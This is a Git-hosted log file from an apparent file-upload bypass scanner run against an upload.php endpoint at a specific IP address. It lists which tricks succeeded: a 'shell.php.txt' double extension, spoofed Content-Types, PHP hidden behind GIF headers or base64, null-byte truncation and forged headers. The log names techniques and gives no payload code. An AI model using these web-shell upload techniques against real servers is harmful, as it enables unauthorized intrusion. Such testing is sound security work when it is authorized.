galaxy/Muxun_programs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
main
Muxun_programs/python/upload_test_log.txt
Galaxy 907bd5af0e mx init 
the muxun is not operated by git,now init
2025-11-09 20:06:06 +08:00

63 lines
2.5 KiB
Plaintext
Raw Permalink Blame History

============================================================
[*] 1. 探测文件扩展名
============================================================
[+] Allowed extension: .txt
[结论] 允许的扩展名: .txt
============================================================
[*] 2. 文件名绕过技巧 (基础扩展名: .txt)
============================================================
[+] Filename trick success: 双扩展名1 | shell.php.txt
============================================================
[*] 3. Content-Type 绕过检测 (文件: test.txt)
============================================================
[+] Content-Type bypass: image/jpeg
[+] Content-Type bypass: image/png
[+] Content-Type bypass: image/gif
[+] Content-Type bypass: image/bmp
[+] Content-Type bypass: text/plain
[+] Content-Type bypass: text/html
[+] Content-Type bypass: text/xml
[+] Content-Type bypass: application/octet-stream
[+] Content-Type bypass: application/x-php
[+] Content-Type bypass: application/json
[+] Content-Type bypass: multipart/form-data
[+] Content-Type bypass: application/x-www-form-urlencoded
[+] Content-Type bypass: application/zip
[+] Content-Type bypass: application/pdf
[+] Content-Type bypass: invalid/type
============================================================
[*] 4. 文件内容绕过检测 (扩展名: .txt)
============================================================
[+] Content bypass: 纯文本
[+] Content bypass: GIF文件头
[+] Content bypass: PHP标签
[+] Content bypass: 短标签
[+] Content bypass: GIF+PHP
[+] Content bypass: PHP+GIF
[+] Content bypass: JS脚本
[+] Content bypass: HTML+PHP
[+] Content bypass: Base64编码PHP
[+] Content bypass: UTF-16 BOM + PHP
[+] Content bypass: 注释包裹PHP
[+] Content bypass: 空字节截断内容
[+] Content bypass: 超大文件
============================================================
[*] 5. 请求头与参数绕过检测
============================================================
[+] Header bypass set 1: {'User-Agent': 'Mozilla/5.0'}
[+] Header bypass set 2: {'User-Agent': 'curl/7.68.0'}
[+] Header bypass set 3: {'X-Forwarded-For': '127.0.0.1'}
[+] Header bypass set 5: {'Referer': 'http://123.60.191.166/upload.php'}
[+] Header bypass set 6: {'Authorization': 'Basic dXNlcjpwYXNz'}
[+] Header bypass set 7: {'Cookie': 'sessionid=abc123'}
============================================================
[*] 1. 探测文件扩展名
============================================================
[结论] 未发现允许的扩展名
Reference in New Issue View Git Blame Copy Permalink